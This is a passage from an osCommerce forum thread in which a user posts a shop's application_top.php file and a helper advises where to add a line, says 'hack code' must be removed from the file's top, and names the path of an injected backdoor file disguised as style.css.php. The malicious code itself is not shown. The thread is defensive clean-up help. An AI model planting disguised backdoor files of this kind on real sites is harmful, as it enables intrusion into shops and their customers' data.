(tep_has_product_attributes($HTTP_GET_VARS['pid'])) { tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid'])); } else { $cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; } } // include the who's online functions require(DIR_WS_FUNCTIONS . 'whos_online.php'); tep_update_whos_online(); // include the password crypto functions require(DIR_WS_FUNCTIONS . 'password_funcs.php'); // include validation functions (right now only email address) require(DIR_WS_FUNCTIONS . 'validations.php'); // split-page-results require(DIR_WS_CLASSES . 'split_page_results.php'); // infobox require(DIR_WS_CLASSES . 'boxes.php'); // auto activate and expire banners require(DIR_WS_FUNCTIONS . 'banner.php'); tep_activate_banners(); tep_expire_banners(); // auto expire special products require(DIR_WS_FUNCTIONS . 'specials.php'); tep_expire_specials(); // auto expire featured products require(DIR_WS_FUNCTIONS . 'featured.php'); tep_expire_featured(); // Bestseller Box // auto expire bestseller products require(DIR_WS_FUNCTIONS . 'bestseller2.php'); tep_expire_bestseller(); // Bestseller Box // calculate category path if (isset($HTTP_GET_VARS['cPath'])) { $cPath = $HTTP_GET_VARS['cPath']; } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) { $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']); } else { $cPath = ''; } if (tep_not_null($cPath)) { $cPath_array = tep_parse_category_path($cPath); $cPath = implode('_', $cPath_array); $current_category_id = $cPath_array[(sizeof($cPath_array)-1)]; } else { $current_category_id = 0; } // include the breadcrumb class and start the breadcrumb trail require(DIR_WS_CLASSES . 'breadcrumb.php'); $breadcrumb = new breadcrumb; $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER); $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT)); // add category names or the manufacturer name to the breadcrumb trail if (isset($cPath_array)) { for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) { $categories_query = tep_db_query("select categories_name from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "'"); if (tep_db_num_rows($categories_query) > 0) { $categories = tep_db_fetch_array($categories_query); $breadcrumb->add($categories['categories_name'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1))))); } else { break; } } } elseif (isset($HTTP_GET_VARS['manufacturers_id'])) { $manufacturers_query = tep_db_query("select manufacturers_name from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'"); if (tep_db_num_rows($manufacturers_query)) { $manufacturers = tep_db_fetch_array($manufacturers_query); $breadcrumb->add($manufacturers['manufacturers_name'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $HTTP_GET_VARS['manufacturers_id'])); } } // add the products model to the breadcrumb trail if (isset($HTTP_GET_VARS['products_id'])) { $model_query = tep_db_query("select products_model from " . TABLE_PRODUCTS . " where products_id = '" . (int)$HTTP_GET_VARS['products_id'] . "'"); if (tep_db_num_rows($model_query)) { $model = tep_db_fetch_array($model_query); $breadcrumb->add($model['products_model'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $HTTP_GET_VARS['products_id'])); } } // initialize the message stack for output messages require(DIR_WS_CLASSES . 'message_stack.php'); $messageStack = new messageStack; // set which precautions should be checked define('WARN_INSTALL_EXISTENCE', 'true'); define('WARN_CONFIG_WRITEABLE', 'true'); define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true'); define('WARN_SESSION_AUTO_START', 'true'); define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true'); // {{ buySAFE Module if ($cart->count_contents() > 0) { require(DIR_WS_CLASSES . 'buysafe.php'); $buysafe_module = new buysafe_class; $WantsBond = ($HTTP_POST_VARS['WantsBond'] ? $HTTP_POST_VARS['WantsBond'] : $HTTP_SESSION_VARS['WantsBond']); $buysafe_cart_id = MODULE_BUYSAFE_BUYSAFE_CART_PREFIX . '-' . tep_session_id() . tep_count_customer_orders(); $buysafe_params = array('WantsBond' => ($WantsBond ? $WantsBond : 'false'), 'buysafe_cart_id' => $buysafe_cart_id); $buysafe_result = $buysafe_module->call_api('AddUpdateShoppingCart', $buysafe_params); // print_r($buysafe_result); if (is_array($buysafe_result)) { global $buysafe_result; tep_session_register('WantsBond'); if (tep_not_null($buysafe_result['faultstring'])) { if (strstr($buysafe_result['faultstring'], 'timed out')) { tep_db_query("update " . TABLE_CONFIGURATION . " set configuration_value = (now() + interval 1 hour) where configuration_key = 'MODULE_BUYSAFE_BUYSAFE_STOP_API_CALLS_TIME'"); } // $messageStack->add('header', 'buySAFE fault: ' . $buysafe_result['faultstring'], 'error'); } } } // }} require_once(DIR_WS_CLASSES . 'preventDuplicates.php'); $preventDuplicates = new preventDuplicates(); ?> Quote Link to comment Share on other sites More sharing options...
♥FIMBLE Posted December 28, 2009 Author Share Posted December 28, 2009 Hi Add it after this line require(DIR_WS_INCLUDES . 'filenames.php'); You also need to get rid of the hack code at the top of your file Nic basket of wonders 1 Quote Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
♥FIMBLE Posted December 28, 2009 Author Share Posted December 28, 2009 decoded the encrypted code to find where the additional files have been added, its location is here /home/rjrdisco/public_html/backup/phpforms/cnk-admin/idx/display/sections/advanced/style.css.php Nic cruda55 and basket of wonders 2 Quote Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.